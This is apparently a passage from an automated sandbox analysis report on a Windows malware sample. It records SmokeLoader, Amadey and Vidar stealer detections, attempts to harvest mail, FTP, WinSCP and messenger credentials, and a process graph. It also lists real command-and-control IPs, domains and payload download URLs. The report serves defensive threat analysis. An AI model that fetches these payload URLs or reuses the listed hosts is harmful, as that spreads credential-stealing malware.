Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C17D75 cpuid 12_2_00C17D75
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8F68.exe Code function: 12_2_00C179FF GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 12_2_00C179FF
Source: C:\Users\user\AppData\Local\Temp\9545.exe Code function: 14_2_00DF53B4 _free,_free,_free,GetTimeZoneInformation,_free, 14_2_00DF53B4
Source: C:\Users\user\AppData\Local\Temp\9545.exe Code function: 14_2_00DE4010 Sleep,IsUserAnAdmin,GetUserNameA,GetComputerNameExW,GetModuleFileNameA, 14_2_00DE4010
Source: C:\Users\user\AppData\Local\Temp\9545.exe Code function: 14_2_00DD4D90 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo, 14_2_00DD4D90

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 14.0.9545.exe.dd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 44.2.gntuud.exe.f00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.9545.exe.dd0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.9545.exe.dd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 44.0.gntuud.exe.f00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.0.gntuud.exe.f00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.gntuud.exe.f00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.9545.exe.dd0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.gntuud.exe.f00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.9545.exe.dd0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.0.gntuud.exe.f00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001D.00000000.425029230.0000000000F01000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.428729367.0000000000F01000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.403627141.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.417948151.0000000000F01000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000000.541818627.0000000000F01000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.403992347.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.402947790.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000002.547069275.0000000000F01000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.499443031.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.783235470.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.788503094.0000000000F01000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.403831524.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\9545.exe, type: DROPPED
Yara detected SmokeLoader
Source: Yara match File source: 00000013.00000002.775997702.0000000000521000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.774640150.00000000006B1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1020, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTR
Source: Yara match File source: 43.3.thgcici.490000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.thgcici.6a0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.thgcici.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.kmxId0uLRn.exe.5d0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.kmxId0uLRn.exe.5e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.kmxId0uLRn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.thgcici.2090000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 43.2.thgcici.470e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 43.2.thgcici.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000002B.00000003.588957160.0000000000490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000002.605352083.0000000002101000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.263185446.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.458517384.00000000020F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.458480142.00000000020D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.354414685.0000000000601000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.354377233.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000002.603086862.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.344354545.0000000005791000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.425062940.0000000002090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Amadey bot
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000015.00000003.498981390.0000000000C04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.499037932.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.499443031.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.783235470.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.785970616.0000000000C07000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: gntuud.exe PID: 5972, type: MEMORYSTR
Yara detected Vidar stealer
Source: Yara match File source: 12.2.8F68.exe.c42a60.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.8F68.exe.c10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.8F68.exe.c42a60.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.8F68.exe.c42a60.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.8F68.exe.c42a60.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000000.404562471.0000000000C42000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.416200644.0000000000C42000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 8F68.exe PID: 1568, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
Tries to harvest and steal ftp login credentials
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
Tries to steal Instant Messenger accounts or passwords
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml

Remote Access Functionality
barindex
Yara detected SmokeLoader
Source: Yara match File source: 00000013.00000002.775997702.0000000000521000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.774640150.00000000006B1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1020, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTR
Source: Yara match File source: 43.3.thgcici.490000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.thgcici.6a0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.thgcici.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.kmxId0uLRn.exe.5d0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.kmxId0uLRn.exe.5e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.kmxId0uLRn.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.thgcici.2090000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 43.2.thgcici.470e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 43.2.thgcici.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000002B.00000003.588957160.0000000000490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000002.605352083.0000000002101000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.263185446.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.458517384.00000000020F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.458480142.00000000020D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.354414685.0000000000601000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.354377233.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000002.603086862.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.344354545.0000000005791000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.425062940.0000000002090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Vidar stealer
Source: Yara match File source: 12.2.8F68.exe.c42a60.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.8F68.exe.c10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.8F68.exe.c42a60.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.8F68.exe.c42a60.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.8F68.exe.c42a60.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000000.404562471.0000000000C42000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.416200644.0000000000C42000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.443923174.0000000000C42000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 8F68.exe PID: 1568, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 766457 Sample: kmxId0uLRn.exe Startdate: 13/12/2022 Architecture: WINDOWS Score: 100 87 Snort IDS alert for network traffic 2->87 89 Malicious sample detected (through community Yara rule) 2->89 91 Antivirus detection for URL or domain 2->91 93 9 other signatures 2->93 10 kmxId0uLRn.exe 2->10         started        13 thgcici 2->13         started        15 thgcici 2->15         started        17 2 other processes 2->17 process3 signatures4 119 Detected unpacking (changes PE section rights) 10->119 121 Maps a DLL or memory area into another process 10->121 123 Checks if the current machine is a virtual machine (disk enumeration) 10->123 19 explorer.exe 7 10->19 injected 125 Multi AV Scanner detection for dropped file 13->125 127 Machine Learning detection for dropped file 13->127 129 Creates a thread in another existing process (thread injection) 13->129 process5 dnsIp6 79 kikangalaassociates.com 185.98.131.207, 443, 49723 RMI-FITECHFR France 19->79 81 r3oidsofsios.com 185.246.221.151, 49699, 49700, 49701 LVLT-10753US Germany 19->81 83 31.41.244.228, 49726, 80 AEROEXPRESS-ASRU Russian Federation 19->83 65 C:\Users\user\AppData\Roaming\thgcici, PE32 19->65 dropped 67 C:\Users\user\AppData\Local\Temp\9545.exe, PE32 19->67 dropped 69 C:\Users\user\AppData\Local\Temp\8F68.exe, PE32 19->69 dropped 71 C:\Users\user\...\thgcici:Zone.Identifier, ASCII 19->71 dropped 103 System process connects to network (likely due to code injection or exploit) 19->103 105 Benign windows process drops PE files 19->105 107 Injects code into the Windows Explorer (explorer.exe) 19->107 109 3 other signatures 19->109 24 9545.exe 3 19->24         started        28 8F68.exe 1 19->28         started        30 explorer.exe 19->30         started        32 8 other processes 19->32 file7 signatures8 process9 file10 73 C:\Users\user\AppData\Local\...\gntuud.exe, PE32 24->73 dropped 111 Antivirus detection for dropped file 24->111 113 Multi AV Scanner detection for dropped file 24->113 115 Machine Learning detection for dropped file 24->115 117 Contains functionality to inject code into remote processes 24->117 34 gntuud.exe 18 24->34         started        39 WerFault.exe 4 10 28->39         started        41 conhost.exe 28->41         started        signatures11 process12 dnsIp13 75 62.204.41.79, 49735, 49736, 49738 TNNET-ASTNNetOyMainnetworkFI United Kingdom 34->75 61 C:\Users\user\AppData\Roaming\...\cred64.dll, PE32 34->61 dropped 63 C:\Users\user\AppData\Local\...\cred64[1].dll, PE32 34->63 dropped 95 Antivirus detection for dropped file 34->95 97 Multi AV Scanner detection for dropped file 34->97 99 Creates an undocumented autostart registry key 34->99 101 2 other signatures 34->101 43 rundll32.exe 34->43         started        47 cmd.exe 1 34->47         started        49 schtasks.exe 1 34->49         started        77 192.168.2.1 unknown unknown 39->77 file14 signatures15 process16 dnsIp17 85 192.168.2.3, 443, 49683, 49689 unknown unknown 43->85 131 System process connects to network (likely due to code injection or exploit) 43->131 133 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 43->133 135 Tries to steal Instant Messenger accounts or passwords 43->135 137 2 other signatures 43->137 51 conhost.exe 47->51         started        53 cmd.exe 47->53         started        55 cacls.exe 47->55         started        59 4 other processes 47->59 57 conhost.exe 49->57         started        signatures18 process19
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
31.41.244.228
 unknown Russian Federation
61974 AEROEXPRESS-ASRU true
185.246.221.151
 r3oidsofsios.com Germany
10753 LVLT-10753US true
62.204.41.79
 unknown United Kingdom
30798 TNNET-ASTNNetOyMainnetworkFI true
185.98.131.207
 kikangalaassociates.com France
16347 RMI-FITECHFR true

Private

IP
192.168.2.1
192.168.2.3

Contacted Domains

Name IP Active
r3oidsofsios.com 185.246.221.151 true
kikangalaassociates.com 185.98.131.207 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://steamcommunity.com/profiles/76561199443972360 false
    		high
    62.204.41.79/fb73jc3/index.php true
    • Avira URL Cloud: safe
    		 low
    http://62.204.41.79/fb73jc3/index.php?scr=1 true
    • Avira URL Cloud: safe
    		 unknown
    https://kikangalaassociates.com/vidar2.exe false
    • Avira URL Cloud: safe
    		 unknown
    http://62.204.41.79/fb73jc3/Plugins/cred64.dll true
    • Avira URL Cloud: malware
    		 unknown
    http://31.41.244.228/fusa/bibar.exe true
    • Avira URL Cloud: malware
    		 unknown
    http://c2csosi228d.com/ true
    • Avira URL Cloud: malware
    		 unknown
    http://s2scomm20.com/ true
    • Avira URL Cloud: malware
    		 unknown
    http://62.204.41.79/fb73jc3/index.php true
    • Avira URL Cloud: safe
    		 unknown
    https://t.me/ttruelive false
      		high
      http://xdd42sdfsdf.com/ true
      • Avira URL Cloud: malware
      		 unknown
      http://r3oidsofsios.com/ true
      • Avira URL Cloud: safe
      		 unknown